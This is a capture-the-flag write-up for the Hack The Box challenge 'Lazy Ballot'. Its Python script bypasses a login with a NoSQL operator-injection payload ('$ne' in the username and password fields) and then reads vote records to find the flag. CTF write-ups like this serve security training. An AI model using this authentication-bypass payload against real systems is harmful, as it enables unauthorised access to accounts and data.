https://app.hackthebox.com/challenges/533

Description

As a Zenium State hacker, your mission is to breach Arodor’s secure election system, subtly manipulating the results to create political chaos and destabilize their government, ultimately giving Zenium State an advantage in the global power struggle.

Exploitation

#!/usr/bin/env python3
import requests
import sys

def get_flag(url):
    session = requests.Session()
    payload = {
        "username": {"$ne": "x"},
        "password": {"$ne": "x"}
    }
    r = session.post(f"{url}/api/login", json=payload)
    if "authenticated successfully" not in r.text:
        print("[-] Auth bypass failed")
        return
    r = session.get(f"{url}/api/votes/list")
    for vote in r.json()['resp']['votes']:
        if 'HTB{' in vote['doc']['region']:
            print(f"[+] Flag: {vote['doc']['region']}", end='')
            return

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    url = "http://" + sys.argv[1]
    get_flag(url)

Summary

Lazy Ballot: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.